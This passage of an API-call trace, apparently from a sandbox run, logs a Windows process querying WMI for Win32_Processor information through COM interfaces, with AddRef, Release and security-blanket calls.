wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_Processor", varVal2=0x0), pType=0x1fe1ec70*=8, plFlavor=0x1fe1ec6c*=64) returned 0x0 [0268.522] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_Processor") returned 0x26 [0268.541] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x768 [0268.541] GetLastError () returned 0x0 [0268.541] SetEvent (hEvent=0x6f4) returned 1 [0268.543] GetLastError () returned 0x0 [0268.544] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1fe1eb88*=0x768, lpdwindex=0x1fe1e940 | out: lpdwindex=0x1fe1e940) returned 0x0 [0268.596] CoGetContextToken (in: pToken=0x1fe1e9d8 | out: pToken=0x1fe1e9d8) returned 0x0 [0268.596] CoGetContextToken (in: pToken=0x1fe1e998 | out: pToken=0x1fe1e998) returned 0x0 [0268.596] WbemDefPath:IUnknown:AddRef (This=0x2261dca8) returned 0x2 [0268.597] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261dca8, riid=0x1fe1ea14*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1ea10 | out: ppvObject=0x1fe1ea10*=0x2261dca8) returned 0x0 [0268.598] WbemDefPath:IUnknown:Release (This=0x2261dca8) returned 0x2 [0268.599] WbemDefPath:IUnknown:Release (This=0x2261dca8) returned 0x1 [0268.599] CoGetContextToken (in: pToken=0x1fe1ea58 | out: pToken=0x1fe1ea58) returned 0x0 [0268.600] CoGetContextToken (in: pToken=0x1fe1ea18 | out: pToken=0x1fe1ea18) returned 0x0 [0268.600] WbemDefPath:IUnknown:AddRef (This=0x2261dca8) returned 0x2 [0268.600] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261dca8, riid=0x1fe1ea94*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1ea90 | out: ppvObject=0x1fe1ea90*=0x2261dca8) returned 0x0 [0268.601] WbemDefPath:IUnknown:Release (This=0x2261dca8) returned 0x2 [0268.602] WbemDefPath:IWbemPath:SetText (This=0x2261dca8, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_Processor") returned 0x0 [0268.602] WbemDefPath:IUnknown:Release (This=0x2261dca8) returned 0x1 [0268.603] IWbemClassObject:Get (in: This=0x22625708, wszName="__CLASS", lFlags=0, pVal=0x1fe1ec04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1fe1ecb8*=0, plFlavor=0x1fe1ecb4*=0 | out: pVal=0x1fe1ec04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Processor", varVal2=0x0), pType=0x1fe1ecb8*=8, plFlavor=0x1fe1ecb4*=64) returned 0x0 [0268.604] SysStringLen (param_1="Win32_Processor") returned 0xf [0268.605] CoGetContextToken (in: pToken=0x1fe1e49c | out: pToken=0x1fe1e49c) returned 0x0 [0268.605] WbemLocator:IUnknown:AddRef (This=0x2261dc84) returned 0x3 [0268.605] IWbemServices:CreateInstanceEnum (in: This=0x2261dc84, strFilter="Win32_Processor", lFlags=17, pCtx=0x0, ppEnum=0x1fe1eadc | out: ppEnum=0x1fe1eadc*=0x22625b44) returned 0x0 [0268.659] IUnknown:QueryInterface (in: This=0x22625b44, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e78c | out: ppvObject=0x1fe1e78c*=0x22625b48) returned 0x0 [0268.660] IClientSecurity:QueryBlanket (in: This=0x22625b48, pProxy=0x22625b44, pAuthnSvc=0x1fe1e7d4, pAuthzSvc=0x1fe1e7d0, pServerPrincName=0x1fe1e7e0, pAuthnLevel=0x1fe1e7d8, pImpLevel=0x1fe1e7c4, pAuthInfo=0x1fe1e7c8, pCapabilites=0x1fe1e7cc | out: pAuthnSvc=0x1fe1e7d4*=0xa, pAuthzSvc=0x1fe1e7d0*=0x0, pServerPrincName=0x1fe1e7e0, pAuthnLevel=0x1fe1e7d8*=0x6, pImpLevel=0x1fe1e7c4*=0x2, pAuthInfo=0x1fe1e7c8, pCapabilites=0x1fe1e7cc*=0x1) returned 0x0 [0268.660] IUnknown:Release (This=0x22625b48) returned 0x1 [0268.660] IUnknown:QueryInterface (in: This=0x22625b44, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e780 | out: ppvObject=0x1fe1e780*=0x1f83e84c) returned 0x0 [0268.660] IUnknown:QueryInterface (in: This=0x22625b44, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e77c | out: ppvObject=0x1fe1e77c*=0x22625b48) returned 0x0 [0268.661] IClientSecurity:SetBlanket (This=0x22625b48, pProxy=0x22625b44, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0268.737] IUnknown:Release (This=0x22625b48) returned 0x2 [0268.737] WbemLocator:IUnknown:Release (This=0x1f83e84c) returned 0x1 [0268.738] CoTaskMemFree (pv=0x1f845d58) [0268.738] WbemLocator:IUnknown:Release (This=0x2261dc84) returned 0x2 [0268.739] IUnknown:QueryInterface (in: This=0x22625b44, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e134 | out: ppvObject=0x1fe1e134*=0x1f83e84c) returned 0x0 [0268.748] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e84c, riid=0x734c4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1fe1e0f0 | out: ppvObject=0x1fe1e0f0*=0x0) returned 0x80004002 [0268.800] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e84c, riid=0x733f0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1fe1dfe4 | out: ppvObject=0x1fe1dfe4*=0x0) returned 0x80004002 [0268.885] WbemLocator:IUnknown:AddRef (This=0x1f83e84c) returned 0x3 [0268.886] CoGetContextToken (in: pToken=0x1fe1df7c | out: pToken=0x1fe1df7c) returned 0x0 [0268.886] CoGetContextToken (in: pToken=0x1fe1df40 | out: pToken=0x1fe1df40) returned 0x0 [0268.886] IUnknown:QueryInterface (in: This=0x7421a0, riid=0x734c3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1df74 | out: ppvObject=0x1fe1df74*=0x7421ac) returned 0x0 [0268.887] IComThreadingInfo:GetCurrentApartmentType (in: This=0x7421ac, pAptType=0x1fe1dfa4 | out: pAptType=0x1fe1dfa4*=3) returned 0x0 [0268.887] IUnknown:Release (This=0x7421ac) returned 0x1 [0268.888] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e84c, riid=0x733a23cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1df64 | out: ppvObject=0x1fe1df64*=0x1f83e7ac) returned 0x0 [0268.889] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1f83e7ac, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1fe1df6c | out: pCid=0x1fe1df6c*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0268.889] WbemLocator:IUnknown:Release (This=0x1f83e7ac) returned 0x3 [0268.894] CoGetContextToken (in: pToken=0x1fe1df74 | out: pToken=0x1fe1df74) returned 0x0 [0268.894] WbemLocator:IUnknown:AddRef (This=0x1f83e84c) returned 0x4 [0268.894] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e84c, riid=0x733f767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1dfe8 | out: ppvObject=0x1fe1dfe8*=0x1f83e834) returned 0x0 [0268.895] WbemLocator:IUnknown:Release (This=0x1f83e84c) returned 0x4 [0268.896] WbemLocator:IRpcOptions:Query (in: This=0x1f83e834, pPrx=0x1f83e84c, dwProperty=2, pdwValue=0x1fe1e00c | out: pdwValue=0x1fe1e00c) returned 0x80004002 [0268.896] WbemLocator:IUnknown:Release (This=0x1f83e834) returned 0x3 [0268.905] WbemLocator:IUnknown:Release (This=0x1f83e84c) returned 0x2 [0268.905] CoGetContextToken (in: pToken=0x1fe1e3e8 | out: pToken=0x1fe1e3e8) returned 0x0 [0268.906] CoGetContextToken (in: pToken=0x1fe1e3a8 | out: pToken=0x1fe1e3a8) returned 0x0 [0268.906] WbemLocator:IUnknown:AddRef (This=0x1f83e84c) returned 0x3 [0268.906] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e84c, riid=0x1fe1e424*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1fe1e420 | out: ppvObject=0x1fe1e420*=0x22625b44) returned 0x0 [0268.907] WbemLocator:IUnknown:Release (This=0x1f83e84c) returned 0x3 [0268.908] IUnknown:Release (This=0x22625b44) returned 0x2 [0268.910] IUnknown:Release (This=0x22625b44) returned 0x1 [0268.911] CoGetContextToken (in: pToken=0x1fe1eab8 | out: pToken=0x1fe1eab8) returned 0x0 [0268.911] CoGetContextToken (in: pToken=0x1fe1ea78 | out: pToken=0x1fe1ea78) returned 0x0 [0268.911] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x3 [0268.911] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1eaf4*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eaf0 | out: ppvObject=0x1fe1eaf0*=0x2261daa8) returned 0x0 [0268.912] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x3 [0268.913] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2261daa8, puCount=0x1fe1ec6c | out: puCount=0x1fe1ec6c*=0x2) returned 0x0 [0268.913] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0268.914] CoGetContextToken (in: pToken=0x1fe1eaa8 | out: pToken=0x1fe1eaa8) returned 0x0 [0268.914] CoGetContextToken (in: pToken=0x1fe1ea68 | out: pToken=0x1fe1ea68) returned 0x0 [0268.914] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x3 [0268.914] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1eae4*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eae0 | out: ppvObject=0x1fe1eae0*=0x2261daa8) returned 0x0 [0268.915] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x3 [0268.916] WbemDefPath:IWbemPath:GetText (in: This=0x2261daa8, lFlags=4, puBuffLength=0x1fe1ec68*=0x0, pszText=0x0 | out: puBuffLength=0x1fe1ec68*=0xf, pszText=0x0) returned 0x0 [0268.916] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0268.917] CoGetContextToken (in: pToken=0x1fe1eaa8 | out: pToken=0x1fe1eaa8) returned 0x0 [0268.917] CoGetContextToken (in: pToken=0x1fe1ea68 | out: pToken=0x1fe1ea68) returned 0x0 [0268.917] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x3 [0268.918] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1eae4*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eae0 | out: ppvObject=0x1fe1eae0*=0x2261daa8) returned 0x0 [0268.919] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x3 [0268.919] WbemDefPath:IWbemPath:GetText (in: This=0x2261daa8, lFlags=4, puBuffLength=0x1fe1ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x1fe1ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0268.919] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0268.920] CoGetContextToken (in: pToken=0x1fe1e600 | out: pToken=0x1fe1e600) returned 0x0 [0268.920] CoGetContextToken (in: pToken=0x1fe1e5c0 | out: pToken=0x1fe1e5c0) returned 0x0 [0268.920] WbemLocator:IUnknown:AddRef (This=0x1f83e84c) returned 0x2 [0268.920] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e84c, riid=0x1fe1e63c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1fe1e638 | out: ppvObject=0x1fe1e638*=0x22625b44) returned 0x0 [0268.921] WbemLocator:IUnknown:Release (This=0x1f83e84c) returned 0x2 [0268.922] IUnknown:AddRef (This=0x22625b44) returned 0x3 [0268.922] IEnumWbemClassObject:Clone (in: This=0x22625b44, ppEnum=0x1fe1ec34 | out: ppEnum=0x1fe1ec34*=0x22625c0c) returned 0x0 [0268.928] IUnknown:QueryInterface (in: This=0x22625c0c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e8f0 | out: ppvObject=0x1fe1e8f0*=0x22625c10) returned 0x0 [0268.929] IClientSecurity:QueryBlanket (in: This=0x22625c10, pProxy=0x22625c0c, pAuthnSvc=0x1fe1e938, pAuthzSvc=0x1fe1e934, pServerPrincName=0x1fe1e944, pAuthnLevel=0x1fe1e93c, pImpLevel=0x1fe1e928, pAuthInfo=0x1fe1e92c, pCapabilites=0x1fe1e930 | out: pAuthnSvc=0x1fe1e938*=0xa, pAuthzSvc=0x1fe1e934*=0x0, pServerPrincName=0x1fe1e944, pAuthnLevel=0x1fe1e93c*=0x6, pImpLevel=0x1fe1e928*=0x2, pAuthInfo=0x1fe1e92c, pCapabilites=0x1fe1e930*=0x1) returned 0x0 [0268.929] IUnknown:Release (This=0x22625c10) returned 0x1 [0268.929] IUnknown:QueryInterface (in: This=0x22625c0c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e8e4 | out: ppvObject=0x1fe1e8e4*=0x1f83ea2c) returned 0x0 [0268.929] IUnknown:QueryInterface (in: This=0x22625c0c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e8e0 | out: ppvObject=0x1fe1e8e0*=0x22625c10) returned 0x0 [0268.930] IClientSecurity:SetBlanket (This=0x22625c10, pProxy=0x22625c0c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0268.934] IUnknown:Release (This=0x22625c10) returned 0x2 [0268.934] WbemLocator:IUnknown:Release (This=0x1f83ea2c) returned 0x1 [0268.934] CoTaskMemFree (pv=0x1f845d28) [0268.935] IUnknown:Release (This=0x22625b44) returned 0x2 [0268.936] IUnknown:QueryInterface (in: This=0x22625c0c, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e28c | out: ppvObject=0x1fe1e28c*=0x1f83ea2c) returned 0x0 [0268.945] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83ea2c, riid=0x734c4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1fe1e248 | out: ppvObject=0x1fe1e248*=0x0) returned 0x80004002 [0268.947] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83ea2c, riid=0x733f0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1fe1e13c | out: ppvObject=0x1fe1e13c*=0x0) returned 0x80004002 [0268.961] WbemLocator:IUnknown:AddRef (This=0x1f83ea2c) returned 0x3 [0268.961] CoGetContextToken (in: pToken=0x1fe1e0d4 | out: pToken=0x1fe1e0d4) returned 0x0 [0268.962] CoGetContextToken (in: pToken=0x1fe1e098 | out: pToken=0x1fe1e098) returned 0x0 [0268.962] IUnknown:QueryInterface (in: This=0x7421a0, riid=0x734c3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e0cc | out: ppvObject=0x1fe1e0cc*=0x7421ac) returned 0x0 [0268.963] IComThreadingInfo:GetCurrentApartmentType (in: This=0x7421ac, pAptType=0x1fe1e0fc | out: pAptType=0x1fe1e0fc*=3) returned 0x0 [0268.963] IUnknown:Release (This=0x7421ac) returned 0x1 [0268.964] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83ea2c, riid=0x733a23cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e0bc | out: ppvObject=0x1fe1e0bc*=0x1f83e98c) returned 0x0 [0268.965] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1f83e98c, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1fe1e0c4 | out: pCid=0x1fe1e0c4*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0268.965] WbemLocator:IUnknown:Release (This=0x1f83e98c) returned 0x3 [0268.970] CoGetContextToken (in: pToken=0x1fe1e0cc | out: pToken=0x1fe1e0cc) returned 0x0 [0268.971] WbemLocator:IUnknown:AddRef (This=0x1f83ea2c) returned 0x4 [0268.972] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83ea2c, riid=0x733f767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e140 | out: ppvObject=0x1fe1e140*=0x1f83ea14) returned 0x0 [0268.973] WbemLocator:IUnknown:Release (This=0x1f83ea2c) returned 0x4 [0268.974] WbemLocator:IRpcOptions:Query (in: This=0x1f83ea14, pPrx=0x1f83ea2c, dwProperty=2, pdwValue=0x1fe1e164 | out: pdwValue=0x1fe1e164) returned 0x80004002 [0268.974] WbemLocator:IUnknown:Release (This=0x1f83ea14) returned 0x3 [0268.983] WbemLocator:IUnknown:Release (This=0x1f83ea2c) returned 0x2 [0268.984] CoGetContextToken (in: pToken=0x1fe1e540 | out: pToken=0x1fe1e540) returned 0x0 [0268.984] CoGetContextToken (in: pToken=0x1fe1e500 | out: pToken=0x1fe1e500) returned 0x0 [0268.984] WbemLocator:IUnknown:AddRef (This=0x1f83ea2c) returned 0x3 [0268.985] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83ea2c, riid=0x1fe1e57c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1fe1e578 | out: ppvObject=0x1fe1e578*=0x22625c0c) returned 0x0 [0268.986] WbemLocator:IUnknown:Release (This=0x1f83ea2c) returned 0x3 [0268.987] IUnknown:Release (This=0x22625c0c) returned 0x2 [0268.987] IUnknown:Release (This=0x22625c0c) returned 0x1 [0269.154] CoGetContextToken (in: pToken=0x1fe1eb34 | out: pToken=0x1fe1eb34) returned 0x0 [0269.154] CoGetContextToken (in: pToken=0x1fe1eaf4 | out: pToken=0x1fe1eaf4) returned 0x0 [0269.154] WbemLocator:IUnknown:AddRef (This=0x1f83ea2c) returned 0x2 [0269.154] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83ea2c, riid=0x1fe1eb70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1fe1eb6c | out: ppvObject=0x1fe1eb6c*=0x22625c0c) returned 0x0 [0269.155] WbemLocator:IUnknown:Release (This=0x1f83ea2c) returned 0x2 [0269.156] IUnknown:AddRef (This=0x22625c0c) returned 0x3 [0269.156] IEnumWbemClassObject:Reset (This=0x22625c0c) returned 0x0 [0269.160] IUnknown:Release (This=0x22625c0c) returned 0x2 [0269.366] CoGetContextToken (in: pToken=0x1fe1ea1c | out: pToken=0x1fe1ea1c) returned 0x0 [0269.367] IUnknown:AddRef (This=0x22625c0c) returned 0x3 [0269.367] IEnumWbemClassObject:Next (in: This=0x22625c0c, lTimeout=-1, uCount=0x1, apObjects=0x1f818f50, puReturned=0x201bb958 | out: apObjects=0x1f818f50*=0x22625c48, puReturned=0x201bb958*=0x1) returned 0x0 [0271.996] IUnknown:QueryInterface (in: This=0x22625c48, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e028 | out: ppvObject=0x1fe1e028*=0x22625c48) returned 0x0 [0272.006] IUnknown:QueryInterface (in: This=0x22625c48, riid=0x734c4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1fe1dfe4 | out: ppvObject=0x1fe1dfe4*=0x0) returned 0x80004002 [0272.009] IUnknown:QueryInterface (in: This=0x22625c48, riid=0x733f0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1fe1ded8 | out: ppvObject=0x1fe1ded8*=0x0) returned 0x80004002 [0272.024] IUnknown:AddRef (This=0x22625c48) returned 0x3 [0272.025] CoGetContextToken (in: pToken=0x1fe1de70 | out: pToken=0x1fe1de70) returned 0x0 [0272.025] CoGetContextToken (in: pToken=0x1fe1de34 | out: pToken=0x1fe1de34) returned 0x0 [0272.025] IUnknown:QueryInterface (in: This=0x7421a0, riid=0x734c3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1de68 | out: ppvObject=0x1fe1de68*=0x7421ac) returned 0x0 [0272.026] IComThreadingInfo:GetCurrentApartmentType (in: This=0x7421ac, pAptType=0x1fe1de98 | out: pAptType=0x1fe1de98*=3) returned 0x0 [0272.027] IUnknown:Release (This=0x7421ac) returned 0x1 [0272.028] IUnknown:QueryInterface (in: This=0x22625c48, riid=0x733a23cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1de58 | out: ppvObject=0x1fe1de58*=0x22625c4c) returned 0x0 [0272.029] IMarshal:GetUnmarshalClass (in: This=0x22625c4c, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1fe1de60 | out: pCid=0x1fe1de60*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0272.030] IUnknown:Release (This=0x22625c4c) returned 0x3 [0272.035] CoGetContextToken (in: pToken=0x1fe1de68 | out: pToken=0x1fe1de68) returned 0x0 [0272.035] IUnknown:AddRef (This=0x22625c48) returned 0x4 [0272.036] IUnknown:QueryInterface (in: This=0x22625c48, riid=0x733f767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1dedc | out: ppvObject=0x1fe1dedc*=0x0) returned 0x80004002 [0272.037] IUnknown:Release (This=0x22625c48) returned 0x3 [0272.047] IUnknown:Release (This=0x22625c48) returned 0x2 [0272.048] CoGetContextToken (in: pToken=0x1fe1e2c8 | out: pToken=0x1fe1e2c8) returned 0x0 [0272.048] CoGetContextToken (in: pToken=0x1fe1e288 | out: pToken=0x1fe1e288) returned 0x0 [0272.048] IUnknown:AddRef (This=0x22625c48) returned 0x3 [0272.049] IUnknown:QueryInterface (in: This=0x22625c48, riid=0x1fe1e304*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1fe1e300 | out: ppvObject=0x1fe1e300*=0x22625c48) returned 0x0 [0272.050] IUnknown:Release (This=0x22625c48) returned 0x3 [0272.051] IUnknown:Release (This=0x22625c48) returned 0x2 [0272.052] IUnknown:Release (This=0x22625c48) returned 0x1 [0272.052] IUnknown:Release (This=0x22625c0c) returned 0x2 [0272.054] CoGetContextToken (in: pToken=0x1fe1ebb8 | out: pToken=0x1fe1ebb8) returned 0x0 [0272.054] IUnknown:AddRef (This=0x22625c48) returned 0x2 [0272.074] IWbemClassObject:Get (in: This=0x22625c48, wszName="__GENUS", lFlags=0, pVal=0x1fe1ec34*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1fe1ece8*=0, plFlavor=0x1fe1ece4*=0 | out: pVal=0x1fe1ec34*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 